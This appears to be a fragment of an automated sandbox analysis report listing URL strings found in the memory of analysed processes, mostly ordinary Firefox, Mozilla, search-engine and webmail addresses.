Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3302865830.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208780144.00000132C279C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000023.00000002.3299612052.00000132C24D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227898022.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C24D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227898022.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsARE
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317272963.000037060F404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3CC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3183823867.00000132C3F10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3254497541.00000132B7DE0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Sending
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://gre/modules/IndexedDB.sys.mjs
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsresource://activity-stream/lib/NewTabInit.jsmextensions.update.
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000023.00000002.3297565804.00000132C22F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000023.00000002.3297565804.00000132C22F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881jar:file
Source: firefox.exe, 00000023.00000002.3299612052.00000132C24D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA24A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitNumber
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB37B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3265483120.00000132BAD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266858592.00000132BAFB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317907853.00003F4396A13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3289593951.00000132BD2BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.comresource://activity-stream/lib/UTEventReporting.sys.mjsresource://activity-str
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3289593951.00000132BD2BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comda39a3ee5e6b4b0d3255bfef95601890afd80709browser.newtabpage.activity
Source: firefox.exe, 00000023.00000002.3253298144.00000132B7A22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000023.00000002.3245288155.00000132B6911000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3245288155.00000132B69B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comdevtools.debugger.remote-portStarted
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
